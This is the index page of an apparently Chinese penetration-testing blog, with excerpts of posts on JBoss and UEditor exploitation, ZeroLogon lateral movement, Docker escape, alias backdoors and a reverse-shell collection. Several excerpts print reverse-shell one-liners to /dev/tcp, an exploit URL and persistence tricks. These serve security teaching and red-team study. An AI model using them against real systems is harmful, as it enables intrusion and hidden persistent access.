HacKerQWQ的博客空间

HacKerQWQ的博客空间

You do things when the opportunities come along.

Jboss利用面整理
由于红蓝对抗中出现Jboss的概率较高,因此记录一下Jboss的利用面 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。 Jboss未授权访问部署war默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。 1/jmx-console 环境搭建这里使用docker镜像 1234docker search testjb...
富文本编辑器漏洞整理
ueditorUEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。 .net版本文件上传漏洞Ueditor编辑器.net版本存在任意文件上传漏洞,攻击者可精心构造环境上传文件,获取服务器管理权限。 影响范围 1UEditor v1.4.3.3 验证漏洞 访问: 1/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 显示 说明存在漏洞 漏洞利用 可以使用post方式直接上传文件到目标网站 1234&...
内网渗透之横向移动
简单记录一下内网中横向移动的方法 漏洞利用Zero-logon漏洞简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 ZeroLogon。 影响范围Windows受影响版本: 12345678910111213Windows Server 2008 R2 for x64-bas...
javaweb代码审计学习(OGNL表达式注入)
OGNL例子1234//创建一个Ognl上下文对象OgnlContext context = new OgnlContext();//@[类全名(包括包路径)]@[方法名|值名]Ognl.getValue('#{"name":"xiaoming","school":"tsinghua"}["school"]', context, context.getRoot()); OGNL表达式概述OGNL(Object Graph Navigation La...
(p神)环境变量命令执行及nginx机制的LFI利用
起因这篇文章是在遇到ezphp这道题目的情况下,作为老年人来学习一下现在的新技术。 题目如下: 1<?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 乍一看可以设置环境变量,联想到后面的echo,想到能不能通过环境变量替换掉echo这个命令,但是思路戛然而止,没有这方面的知识储备,于是看wp进行学习。 本文包含两部分内容 p神文章介绍...
Web安全之机器学习算法
有监督学习算法有监督学习算法主要有决策树、支持向量机(SVM)、朴素贝叶斯、K近邻、随机森林、逻辑回归。 K近邻算法K近邻算法(k-nearest neighbors,KNN)是一种机器学习方法,根据你距离最近的k 个邻居来判断出你的分类。也就是说,如果离你最近的K个邻居中有5个a分类,2个b分类,那你就属于a分类。可以看出,KNN做分类预测时,一般是选择多数表决法。KNN不只能做分类,而且可以做回归。我们知道回归一般对连续值进行预测,KNN算法就是用K个邻居的平均值作为预测值。 KNN常用的算法为: Brute Force; K-D Tree Ball Tree。 简单记忆:对于小...
Docker逃逸几种方法
Docker逃逸Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,但本次通过利用Dirty Cow漏洞,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机的文件。 它从容器中逃了出来,因此我们形象的称之为Docker逃逸漏洞。 逃逸的前提是确定目前所在环境是docker环境 查找.dockerenv文件 1ls -alh /.dockerenv 查找系统进程的cgroup信息 1cat /proc/1/cgroup 如果是docker,显示: 12345678...
渗透测试之反弹shell合集
假设本机地址10.10.10.11,监听端口443。 Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口 1nc -lvp 443 然后在靶机上执行如下命令: 123456789bash -i >& /dev/tcp/10.10.10.11/443 0>&1/bin/bash -i > /dev/tcp/10.10.10.11/443 0<& 2>&1exec 5<>/dev...
内网渗透之Linux及Windows隐藏篇
Windows隐藏篇隐藏文件1、利用文件属性 最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。 如何真正隐藏文件? 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。 1attrib +s +a +h +r D:\test\project\test.txt 这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见。 破解隐藏文件: 打开电脑文件夹选项卡,取消”隐藏受保护的操作...
权限维持之alisa后门
alias后门简介alias 命令的功能是为命令设置别名,比如我想让我每次输入 ls 的时候都实现 ls -al 那怎么实现呢? 1alias ls = 'ls -al' 对于通过ssh远程登录的用户来说,每次设置只在本次连接过程中有效,下次再进行登录的时候就不会这样了。 通过alias查看目前session已有的alias命令 当用户常用的命令如whoami被alias修改为其他二进制可执行文件的时候,可以实现命令执行、权限维持等操作。 alias后门配置文件 /etc/profile 【系统级】Linux是一个多用户操作系统。用户登录或切换(即Log...
avatar
HacKerQWQ
striving
FRIENDS
friendA friendB